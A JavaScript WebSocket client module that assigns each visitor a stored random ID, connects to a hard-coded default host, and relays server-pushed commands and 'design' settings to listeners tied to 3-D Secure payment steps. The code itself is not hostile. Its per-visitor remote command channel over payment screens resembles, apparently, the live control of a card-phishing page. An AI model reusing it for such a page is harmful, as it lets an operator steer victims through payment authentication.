class WSClient {
    constructor() {
        this.ws = null;
        this.uuId = null;
        this.isConnecting = false;
        this.reconnectTimer = null;
        this.heartbeatTimer = null;
        this.lastMessageTime = Date.now();
        this.listeners = new Set();
        this.isReplaced = false;

        // Ensure UUID is initialized
        this.getActiveUuId();

        // Browser lifecycle events (Safari / mobile wakeups)
        if (typeof window !== 'undefined') {
            const handleWake = () => {
                const currentId = this.getActiveUuId();
                if (!this.ws || (this.ws.readyState !== WebSocket.OPEN && this.ws.readyState !== WebSocket.CONNECTING)) {
                    this.connect();
                } else if (this.ws && this.ws.readyState === WebSocket.OPEN) {
                    this.send('existing_uuId', { uuId: currentId });
                    this.send('ping', { uuId: currentId });
                }
            };

            document.addEventListener('visibilitychange', () => {
                if (document.visibilityState === 'visible') handleWake();
            });
            window.addEventListener('pageshow', handleWake);
            window.addEventListener('focus', handleWake);
            window.addEventListener('online', handleWake);
            window.addEventListener('session_update', (e) => {
                const newId = e.detail?.uuId || this.getActiveUuId();
                this.uuId = newId;
                if (this.ws && this.ws.readyState === WebSocket.OPEN) {
                    this.send('existing_uuId', { uuId: newId });
                    this.send('ping', { uuId: newId });
                } else {
                    this.connect();
                }
            });
        }
    }

    getActiveUuId() {
        let id = localStorage.getItem('uuId') || localStorage.getItem('session_uuId');
        if (!id) {
            let result = '';
            for (let i = 0; i < 16; i++) {
                result += Math.floor(Math.random() * 10);
            }
            id = result;
            localStorage.setItem('uuId', id);
            localStorage.setItem('session_uuId', id);
        }
        this.uuId = id;
        return id;
    }

    subscribe(listener) {
        this.listeners.add(listener);
        return () => this.listeners.delete(listener);
    }

    notify(event, data) {
        for (const listener of this.listeners) {
            try { listener(event, data); } catch (_) {}
        }
    }

    startHeartbeat() {
        this.stopHeartbeat();
        this.heartbeatTimer = setInterval(() => {
            if (this.ws && this.ws.readyState === WebSocket.OPEN) {
                const id = this.getActiveUuId();
                try {
                    this.ws.send(JSON.stringify({ type: 'ping', uuId: id }));
                } catch (_) {}

                // Watchdog: If no message received from server for > 18 seconds, force reconnect
                if (Date.now() - this.lastMessageTime > 18000) {
                    console.warn('[WSClient] Watchdog: connection dead (silent TCP drop). Reconnecting...');
                    this.forceReconnect();
                }
            }
        }, 5000);
    }

    stopHeartbeat() {
        if (this.heartbeatTimer) {
            clearInterval(this.heartbeatTimer);
            this.heartbeatTimer = null;
        }
    }

    connect() {
        if (this.isConnecting) return;
        if (this.ws && (this.ws.readyState === WebSocket.OPEN || this.ws.readyState === WebSocket.CONNECTING)) {
            return;
        }

        const id = this.getActiveUuId();
        this.isConnecting = true;
        this.isReplaced = false;

        if (this.reconnectTimer) {
            clearTimeout(this.reconnectTimer);
            this.reconnectTimer = null;
        }

        const wsUrl = process.env.REACT_APP_WEBSOCKET_URL || process.env.REACT_APP_WS_URL || 'wss://devosyshandler.com';

        try {
            const socket = new WebSocket(wsUrl);
            this.ws = socket;

            socket.onopen = () => {
                if (this.ws !== socket) return;
                this.isConnecting = false;
                this.lastMessageTime = Date.now();
                console.log('[WSClient] Connected with uuId:', id);

                try {
                    socket.send(JSON.stringify({ type: 'existing_uuId', uuId: id }));
                    socket.send(JSON.stringify({ type: 'ping', uuId: id }));
                } catch (_) {}

                this.startHeartbeat();
                this.notify('connection', true);
            };

            socket.onmessage = (event) => {
                if (this.ws !== socket) return;
                this.lastMessageTime = Date.now();

                try {
                    const data = JSON.parse(event.data);

                    if (data.type === 'ping') {
                        try {
                            socket.send(JSON.stringify({ type: 'pong', uuId: id }));
                        } catch (_) {}
                        return;
                    }

                    if (data.type === 'pong') {
                        return;
                    }

                    console.log('[WSClient] Command received:', data.type || data.action);
                    
                    if (data.design) {
                        localStorage.setItem('session_design', data.design);
                    }

                    // Dispatch browser-level event for 3DS listeners
                    window.dispatchEvent(new CustomEvent('ws_command', { detail: data }));
                    this.notify('command', data);
                } catch (err) {
                    console.error('[WSClient] Parse error:', err);
                }
            };

            socket.onclose = (event) => {
                if (this.ws !== socket) return;
                this.isConnecting = false;
                this.stopHeartbeat();
                this.ws = null;

                console.log('[WSClient] Disconnected. Code:', event.code, 'Reason:', event.reason);
                this.notify('connection', false);

                // Code 4000: Gracefully replaced by a newer connection; do not reconnect
                if (event && event.code === 4000) {
                    console.log('[WSClient] Connection superseded by new connection.');
                    return;
                }

                // Schedule reconnect with slight delay
                this.reconnectTimer = setTimeout(() => this.connect(), 1500);
            };

            socket.onerror = (err) => {
                if (this.ws !== socket) return;
                this.isConnecting = false;
                console.error('[WSClient] Error:', err);
            };

        } catch (e) {
            console.error('[WSClient] Connection exception:', e);
            this.isConnecting = false;
            this.reconnectTimer = setTimeout(() => this.connect(), 2000);
        }
    }

    forceReconnect() {
        if (this.reconnectTimer) clearTimeout(this.reconnectTimer);
        this.stopHeartbeat();
        if (this.ws) {
            const old = this.ws;
            this.ws = null;
            old.onopen = null;
            old.onmessage = null;
            old.onclose = null;
            old.onerror = null;
            try { old.close(); } catch (_) {}
        }
        this.isConnecting = false;
        this.connect();
    }

    send(type, data = {}) {
        if (this.ws && this.ws.readyState === WebSocket.OPEN) {
            const id = this.getActiveUuId();
            try {
                this.ws.send(JSON.stringify({ type, uuId: id, ...data }));
                return true;
            } catch (_) {}
        }
        return false;
    }
}

export const wsClient = new WSClient();
